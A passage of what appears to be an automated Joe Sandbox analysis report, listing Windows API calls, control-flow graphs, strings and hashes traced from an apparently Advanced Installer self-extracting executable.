                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,00000000,003AE8AD,000000FF,?,80004005,DF534560,00000008,00000000,00000008,00000000), ref: 002B5F43
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,DF534560,00000008,00000000,?,00000000,003AE8AD,000000FF,?,80004005,DF534560,00000008,00000000,00000008,00000000,003AE8AD), ref: 002B5F82
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,DF534560,00000008,00000000,?,00000000,003AE8AD,000000FF,?,80004005,DF534560,00000008,00000000,00000008,00000000,003AE8AD), ref: 002B5F72
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002B6071
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DeleteDirectoryErrorFileHeapInit_thread_footerLastRemove$AllocateFindProcessResource_wcsrchr
                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                          • API String ID: 3513978327-4282027825
                                                                                                                                                                                                                                                                          • Opcode ID: 6395781cec13270dd7b6e07f5e27b76c8dc4ecc9cb9995c35570a91b6b609b38
                                                                                                                                                                                                                                                                          • Instruction ID: 2f88eb157e31d3c38742bb70d9eb1d0e261492ac626cb8472f5a2a67a3182480
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6395781cec13270dd7b6e07f5e27b76c8dc4ecc9cb9995c35570a91b6b609b38
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA1DD71A10A16DFDB10DF68C848BEEB7A8FF05361F148669E921DB2D1DB35E910CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2670 348c83-348c8e 2671 348c90-348c9c DecodePointer 2670->2671 2672 348c9d-348cb4 LoadLibraryExA 2670->2672 2673 348cb6-348ccb call 348d33 2672->2673 2674 348d2e 2672->2674 2673->2674 2678 348ccd-348ce2 call 348d33 2673->2678 2676 348d30-348d32 2674->2676 2678->2674 2681 348ce4-348cf9 call 348d33 2678->2681 2681->2674 2684 348cfb-348d10 call 348d33 2681->2684 2684->2674 2687 348d12-348d2c DecodePointer 2684->2687 2687->2676
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(DF534560,?,?,00348FC9,00459E58,?,?,?,002F5CF7,00000000,DF534560,?,002F5E32), ref: 00348C95
                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,DF534560,?,?,00348FC9,00459E58,?,?,?,002F5CF7,00000000,DF534560,?,002F5E32), ref: 00348CAA
                                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(DF534560,?,?,?,?,?,?,?,?,?,00000000,DF534560,?,002F5E32), ref: 00348D26
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DecodePointer$LibraryLoad
                                                                                                                                                                                                                                                                          • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                                                                                                                                                                          • API String ID: 1423960858-1745123996
                                                                                                                                                                                                                                                                          • Opcode ID: c2d3b4de0a9cd18507e1250a78826f476b5afb1a2058746955b39fcf7cce0db8
                                                                                                                                                                                                                                                                          • Instruction ID: 122e82ba7f0eec1c3938a4f10c76d27b432088f3c8ee7088aca7970d90262b25
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2d3b4de0a9cd18507e1250a78826f476b5afb1a2058746955b39fcf7cce0db8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1016131D42314A6CB17A724AD07FCE3B959B22B89F140065FC09BE1D3DEA5AD088B99
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2763 2da3c0-2da3fc 2764 2da3fe-2da403 call 1b9790 2763->2764 2765 2da408-2da416 call 2e3330 2763->2765 2764->2765 2769 2da41c-2da427 2765->2769 2770 2da502-2da504 2765->2770 2771 2da429-2da441 call 2b62a0 2769->2771 2772 2da457-2da45e 2769->2772 2773 2da528-2da531 2770->2773 2774 2da506 2770->2774 2786 2da446-2da451 2771->2786 2787 2da443 2771->2787 2778 2da4e9-2da4ff 2772->2778 2779 2da464-2da46b call 1b9e20 2772->2779 2776 2da644-2da657 2773->2776 2777 2da537-2da53e call 1b9e20 2773->2777 2780 2da50c-2da519 call 2b66d0 2774->2780 2781 2da508-2da50a 2774->2781 2791 2da65a-2da664 call 1b9ae0 2777->2791 2792 2da544-2da5b1 call 1b8d10 CreateFileW call 2b4240 2777->2792 2779->2791 2793 2da471-2da498 call 1cf3c0 2779->2793 2790 2da51e-2da526 2780->2790 2781->2773 2781->2780 2786->2770 2786->2772 2787->2786 2790->2777 2811 2da5cf-2da5da 2792->2811 2812 2da5b3 2792->2812 2803 2da4b9-2da4df call 2e4960 2793->2803 2804 2da49a-2da49f 2793->2804 2803->2778 2814 2da4e1-2da4e4 2803->2814 2806 2da4a0-2da4a9 2804->2806 2806->2806 2809 2da4ab-2da4b4 call 1cf3c0 2806->2809 2809->2803 2817 2da5dd-2da604 SetFilePointer SetEndOfFile 2811->2817 2815 2da5bd-2da5cd 2812->2815 2816 2da5b5-2da5bb 2812->2816 2814->2778 2815->2817 2816->2811 2816->2815 2818 2da614-2da629 2817->2818 2819 2da606-2da60d FindCloseChangeNotification 2817->2819 2820 2da62b-2da62e 2818->2820 2821 2da633-2da63e 2818->2821 2819->2818 2820->2821 2821->2776 2821->2777
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 002DA586
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 002DA5E5
                                                                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?), ref: 002DA5EE
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 002DA607
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationPointer
                                                                                                                                                                                                                                                                          • String ID: %sholder%d.aiph$Not enough disk space to extract file:$t=
                                                                                                                                                                                                                                                                          • API String ID: 3635197886-729966713
                                                                                                                                                                                                                                                                          • Opcode ID: 6dcffd28cf7516ac6b0af5ffec166720ed9da7d9c80090eb6f0eda3d55c78ffc
                                                                                                                                                                                                                                                                          • Instruction ID: eae1d5fbb163fa8133914f99916fa6d1449709587be4540530aa886840d0cb61
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dcffd28cf7516ac6b0af5ffec166720ed9da7d9c80090eb6f0eda3d55c78ffc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5818D75A1020A9BDB10DF68CC49BAEB7A8FF44320F14865AF925E7391DB74ED10CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,AA831995,?,?), ref: 6A564988
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00001000,?,00000000,00001000), ref: 6A5649FB
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6A564C0A
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,00000000,00000000), ref: 6A564CDE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandle
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1724936099-0
                                                                                                                                                                                                                                                                          • Opcode ID: a612e101335293d8812562756999b7b0e380ec2e46dff98cf193e0184d4fb50e
                                                                                                                                                                                                                                                                          • Instruction ID: 0e368cd348324521d5ba1debbebcd0d1f4cfe7ce0c5ed68e05d32b1056364a83
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a612e101335293d8812562756999b7b0e380ec2e46dff98cf193e0184d4fb50e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AD18F70E00308EFDB15CFA4C968B9EBBB5FF45304F21865DD455AB2A1EB70AA44CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(003BB53D,-00000400,?,00000002,00000400,DF534560,?,?,?), ref: 002F3EC6
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 002F3ED4
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(003BB53D,00000000,00000400,?,00000000,?,?), ref: 002F3EEF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$ErrorLastPointerRead
                                                                                                                                                                                                                                                                          • String ID: ADVINSTSFX
                                                                                                                                                                                                                                                                          • API String ID: 64821003-4038163286
                                                                                                                                                                                                                                                                          • Opcode ID: 10408936e2bc1b5c8c5567d3b2aa38168149a46468635e94a0d92506522e427a
                                                                                                                                                                                                                                                                          • Instruction ID: c962ce3bd1b3cd57b1907dda386680c62f51a222ec743018111138067f0c10ae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10408936e2bc1b5c8c5567d3b2aa38168149a46468635e94a0d92506522e427a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5261B171E1020A9BDB15CFA8C884BBEFBB5FF45350F244269EA15A7281D770EE51CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6A56D60F
                                                                                                                                                                                                                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6A56D629
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2442719207-0
                                                                                                                                                                                                                                                                          • Opcode ID: b701c10bef9de4bac7e105031c4cbc606d994e4a9be4aea19da6d81a3eea8f8d
                                                                                                                                                                                                                                                                          • Instruction ID: 8aad50986af8de599b07afa51fb65f1aad4d68354ac8b8cbc7aae5b645ac36de
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b701c10bef9de4bac7e105031c4cbc606d994e4a9be4aea19da6d81a3eea8f8d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A241E573D00A24EFDB22DF65CC44B9E3AF4EBC1754F225915E815AB161DF314D428B91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002BAE60: __Init_thread_footer.LIBCMT ref: 002BAF32
                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 002BF369
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?), ref: 002BF39A
                                                                                                                                                                                                                                                                          • Wow64DisableWow64FsRedirection.KERNEL32(00000000,?), ref: 002BF3CD
                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 002BF3EF
                                                                                                                                                                                                                                                                          • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 002BF41E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Wow64$FileRedirectionTemp$CopyDisableInit_thread_footerNamePathRevert
                                                                                                                                                                                                                                                                          • String ID: shim_clone
                                                                                                                                                                                                                                                                          • API String ID: 885488785-3944563459
                                                                                                                                                                                                                                                                          • Opcode ID: 5d91446ca94997349a452925750ac3c16810f502071d75e090441490b5943f34
                                                                                                                                                                                                                                                                          • Instruction ID: 90e6331aca5837f02d698d3f841f857d5093284c13cb977860de4f4a82e72d18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d91446ca94997349a452925750ac3c16810f502071d75e090441490b5943f34
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11511170A102589ADB25DF24CD05BEEB7F9EF94700F1480BAEA09D71C1DB70AE65CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 002B7DD8
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002B7DEF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 002B7E1F
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 002B7ED0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$ChangeCloseCurrentFindNotificationProcess
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 343043762-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: 54f0afdee3f53e3deb1580153cc7d67da71c2f56a4963b778f55120906b7edce
                                                                                                                                                                                                                                                                          • Instruction ID: 3c29ef8d107afe4031685d2d327c8688a22f199082fc5bc864c973654228b8ed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54f0afdee3f53e3deb1580153cc7d67da71c2f56a4963b778f55120906b7edce
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3414671D1421AEFDF11DFA0DC48BEEBBB8EF08354F104465E511B6290D779A904CBA4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,AA831995,00000001,00000000), ref: 6A553CFF
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 6A553E2B
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 6A553E57
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6A553E6D
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6A553EB0
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6A553ED7
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Write$CloseCreateHandlePointerSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3932932802-0
                                                                                                                                                                                                                                                                          • Opcode ID: c040072fad0db64499a8e714613b72f71d54b18caa83aa77410445fc18c247e9
                                                                                                                                                                                                                                                                          • Instruction ID: 799ad293f47cf1f46f3ac726025c093b9276a953f581fdc1d1a8c57d7a9808ae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c040072fad0db64499a8e714613b72f71d54b18caa83aa77410445fc18c247e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85913870D00208EFEB11CFA5C959BDEBBB4BF05314F21815AE524A7281DB75AA58CFA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,DF534560,?,00000010,?,002D13D0,?), ref: 002CE076
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,?,00000010,00000000), ref: 002CE0BF
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,DF534560,?,?,00000000,00000078,?), ref: 002CE101
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 002CE17A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 2405668454-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: 78e6aff3ca849ceca666ae08eb81c22ac5db2d930b45c7a7cc5c32b58310c8b0
                                                                                                                                                                                                                                                                          • Instruction ID: a1975231790b9742c901e2dcd10af345cc6f1f7b43573fdaed186bb93028d45c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78e6aff3ca849ceca666ae08eb81c22ac5db2d930b45c7a7cc5c32b58310c8b0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4518A71910609ABDB11CFA8CC48FAEFBB8EF45324F188359E424AB2D1D7B49D15CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,DF534560,?,?,?,00000000,?,Function_001C1810,000000FF), ref: 002A2323
